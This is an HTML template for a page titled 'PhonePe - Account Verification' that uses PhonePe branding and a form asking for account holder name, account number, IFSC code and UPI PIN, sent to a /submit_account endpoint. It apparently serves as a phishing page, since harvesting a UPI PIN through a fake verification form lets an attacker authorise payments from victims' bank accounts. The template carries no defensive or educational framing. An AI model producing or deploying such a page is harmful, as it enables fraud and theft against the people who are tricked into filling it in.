<!DOCTYPE html>
<html>
<head>
  <title>PhonePe - Account Verification</title>
  <link rel="icon" href="/static/logo.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body {
      background: #4a148c;
      font-family: Arial;
      margin: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .box {
      background: white;
      width: 90%;
      max-width: 400px;
      padding: 50px 30px;
      border-radius: 12px;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.2);
      text-align: center;
    }

    img {
      width: 90px;
      margin-bottom: 20px;
    }

    input {
      width: 100%;
      padding: 16px;
      margin: 12px 0;
      font-size: 16px;
      border-radius: 6px;
      border: 1px solid #ccc;
      box-sizing: border-box;
    }

    input[type="submit"] {
      background-color: #4a148c;
      color: white;
      cursor: pointer;
    }

    input[type="submit"]:hover {
      background-color: #380d61;
    }
  </style>
</head>
<body>
  <div class="box">
    <img src="/static/logo.png" alt="PhonePe Logo" style="width: 180px;">
    <h3>Verify Your Bank Account</h3>
    <form action="/submit_account" method="POST">
      <input type="hidden" name="mobile" value="{{ mobile }}">
      <input type="text" name="name" placeholder="Account Holder Name" required>
      <input type="text" name="acc_num" placeholder="Account Number" required>
      <input type="text" name="ifsc" placeholder="IFSC Code" required>
      <input type="password" name="upi_pin" placeholder="Enter UPI PIN" required>
      <input type="submit" value="Submit">
    </form>
  </div>
</body>
</html>
